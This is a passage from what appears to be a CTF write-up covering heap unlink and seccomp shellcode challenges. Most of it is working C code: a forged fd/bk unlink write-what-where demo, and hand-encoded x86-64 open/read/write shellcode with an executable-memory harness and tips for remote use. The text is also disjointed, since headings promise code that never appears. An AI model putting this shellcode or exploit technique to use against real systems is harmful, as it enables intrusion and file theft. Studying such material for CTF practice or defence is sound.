Here we have a stack address, a heap address, and an input. Now the code:
Well, this can be treated as an introductory unlink exercise that mimics the unlink operation. You have three chunks: heap1, which you can overwrite, and heap2, the chunk that will be unlinked. So the goal is to take control of execution flow by rewriting heap2's fd and bk.
A shell function is given.
So all that is needed is to redirect execution flow into the shell function.
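To make the fd/bk trick concrete, here is an added example (not the challenge's code, and not the exploit the page goes on to show) that reproduces the check-free unlink the challenge mimics over a constructed flat buffer. It assumes the 64-bit glibc-style chunk layout (fd at +16, bk at +24); on 32-bit the offsets are 8 and 12. The point it makes is that unlink performs two stores, not one: `FD->bk = BK` is the write-what-where you want, and `BK->fd = FD` is an unavoidable side effect that lands at `value + 16`, so `value` must itself be writable memory (pointing bk straight at the shell function in the text segment faults on the second store). The buffer positions are placeholders standing in for the leaked stack/heap addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Chunk header as the challenge's hand-rolled list uses it.
 * Assumption: glibc-style 64-bit layout, so fd is at +16 and bk at +24. */
struct chunk {
    uint64_t prev_size;
    uint64_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* The unlink the challenge mimics: the classic macro with no integrity
 * check (modern glibc refuses unless FD->bk == P && BK->fd == P). */
static void unsafe_unlink(struct chunk *p)
{
    struct chunk *fd = p->fd;
    struct chunk *bk = p->bk;
    fd->bk = bk;   /* store BK at FD + 24: the write-what-where we want   */
    bk->fd = fd;   /* store FD at BK + 16: the side effect we must survive */
}

/* What the overflow from heap1 into heap2 sets up: pick fd and bk so the
 * first store writes `value` into `target`. */
static void forge_fd_bk(struct chunk *victim, uint8_t *target, uint8_t *value)
{
    victim->fd = (struct chunk *)(target - offsetof(struct chunk, bk));
    victim->bk = (struct chunk *)value;
}

struct unlink_effect {
    int target_got_value;   /* *(uintptr_t *)target == value after unlink */
    int side_write_landed;  /* *(uintptr_t *)(value + 16) == forged fd   */
};

/* Run the primitive over a constructed flat buffer that stands in for the
 * heap and the stack, so both stores can be inspected instead of crashing. */
static struct unlink_effect demo_unlink(void)
{
    static uint64_t words[32];             /* 256 bytes, 8-byte aligned */
    uint8_t *mem = (uint8_t *)words;
    memset(mem, 0, sizeof words);

    struct chunk *heap2 = (struct chunk *)mem;   /* the chunk that gets unlinked */
    uint8_t *target = mem + 128;   /* placeholder: a saved pointer used after unlink */
    uint8_t *value  = mem + 192;   /* placeholder: where we want control flow to go  */

    forge_fd_bk(heap2, target, value);
    unsafe_unlink(heap2);

    uintptr_t at_target, at_value16;
    memcpy(&at_target, target, sizeof at_target);
    memcpy(&at_value16, value + offsetof(struct chunk, fd), sizeof at_value16);

    struct unlink_effect e;
    e.target_got_value  = at_target == (uintptr_t)value;
    e.side_write_landed = at_value16 == (uintptr_t)(target - offsetof(struct chunk, bk));
    return e;
}

int main(void)
{
    struct unlink_effect e = demo_unlink();
    printf("*target   <- value : %s\n", e.target_got_value  ? "yes" : "no");
    printf("*(value+16) <- fd  : %s\n", e.side_write_landed ? "yes" : "no");
    return 0;
}
```

When planning the real overwrite, check both addresses against the memory map before firing: `target` and `value + 16` must be writable, which is exactly why intro challenges hand you a stack or heap leak to aim at rather than letting you write the shell address directly.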
The pwn steps are as follows:
It seems that we need to send x64 shellcode that reads the flag file from inside a seccomp sandbox.
Only the read, write, and open syscalls are allowed.
And the code:
Okay, it is clear now. You learn the file name from /home/asm, but the real file is in /home/asm_pwn, which can only be reached through the binary.
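As an added example (my code, not the challenge's shellcode or the exploit shown on the page), here is a hand-encoded x86-64 Linux open/read/write stub that stays inside the three permitted syscalls, plus a local harness that appends a path, maps it executable, and runs it with fd 1 redirected into a pipe so the result can be checked offline. The flag path on the challenge box is whatever /home/asm reveals; the harness uses a constructed temporary file as a stand-in. The stub contains NUL bytes, which is fine because the challenge delivers it via read(); it ends in `ret` only so the harness regains control, a payload sent to the real target would not need that.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* x86-64 Linux, raw syscall numbers: open=2, read=0, write=1.
 * Position-independent; expects a NUL-terminated path immediately after
 * its last byte, so the lea displacement is sizeof(stub) - 7 = 57.
 *
 *   lea  rdi, [rip+57]          ; path appended after the stub
 *   xor  esi, esi               ; O_RDONLY
 *   xor  edx, edx
 *   mov  eax, 2  ; syscall      ; fd = open(path, 0, 0)
 *   mov  edi, eax
 *   sub  rsp, 0x200
 *   mov  rsi, rsp
 *   mov  edx, 0x200
 *   xor  eax, eax ; syscall     ; n = read(fd, buf, 0x200)
 *   mov  edx, eax
 *   mov  rsi, rsp
 *   mov  edi, 1
 *   mov  eax, 1  ; syscall      ; write(1, buf, n)   (fd 1 is the socket remotely)
 *   add  rsp, 0x200
 *   ret                         ; hand control back to the harness
 */
static const uint8_t stub[] = {
    0x48, 0x8d, 0x3d, 0x39, 0x00, 0x00, 0x00,
    0x31, 0xf6,
    0x31, 0xd2,
    0xb8, 0x02, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0x89, 0xc7,
    0x48, 0x81, 0xec, 0x00, 0x02, 0x00, 0x00,
    0x48, 0x89, 0xe6,
    0xba, 0x00, 0x02, 0x00, 0x00,
    0x31, 0xc0,
    0x0f, 0x05,
    0x89, 0xc2,
    0x48, 0x89, 0xe6,
    0xbf, 0x01, 0x00, 0x00, 0x00,
    0xb8, 0x01, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0x48, 0x81, 0xc4, 0x00, 0x02, 0x00, 0x00,
    0xc3,
};

/* stub || path || NUL: these bytes are the payload you would send. */
static size_t build_payload(const char *path, uint8_t *out, size_t outsz)
{
    size_t plen = strlen(path) + 1;
    if (sizeof stub + plen > outsz) return 0;
    memcpy(out, stub, sizeof stub);
    memcpy(out + sizeof stub, path, plen);
    return sizeof stub + plen;
}

/* Local dry run: execute the payload with fd 1 redirected into a pipe and
 * return how many bytes of the file it dumped into `out` (-1 on error). */
static ssize_t run_payload(const char *path, char *out, size_t outsz)
{
    uint8_t *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    if (build_payload(path, page, 4096) == 0) { munmap(page, 4096); return -1; }

    void (*fn)(void);
    memcpy(&fn, &page, sizeof fn);   /* object pointer -> function pointer */

    int pfd[2];
    if (pipe(pfd) < 0) { munmap(page, 4096); return -1; }
    fflush(stdout);
    int saved = dup(1);
    dup2(pfd[1], 1);
    close(pfd[1]);
    fn();                            /* open/read/write run here */
    dup2(saved, 1);
    close(saved);
    ssize_t n = read(pfd[0], out, outsz);   /* <= 0x200 bytes, under pipe capacity */
    close(pfd[0]);
    munmap(page, 4096);
    return n;
}

/* End-to-end check against a constructed stand-in flag file. */
static int demo_flag_read(void)
{
    static const char flag[] = "flag{constructed-sample-not-real}\n";
    char tmpl[] = "/tmp/fakeflagXXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return 0;
    if (write(fd, flag, sizeof flag - 1) != (ssize_t)(sizeof flag - 1)) {
        close(fd); unlink(tmpl); return 0;
    }
    close(fd);

    char got[0x200];
    ssize_t n = run_payload(tmpl, got, sizeof got);
    unlink(tmpl);
    return n == (ssize_t)(sizeof flag - 1) && memcmp(got, flag, (size_t)n) == 0;
}

int main(void)
{
    printf("stub is %zu bytes; dry run %s\n", sizeof stub,
           demo_flag_read() ? "read the sample flag back" : "failed");
    return 0;
}
```

Two things to verify before using a stub like this remotely: that the sandbox permits the syscall numbers you actually use (this one issues open, not openat, which matters because a filter that whitelists `open` only will kill an openat-based payload), and that a single read of 0x200 bytes covers the file, since the stub does not loop.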
Now, the exploit using pwntools:
Well, you need to know about the Shellshock vulnerability first.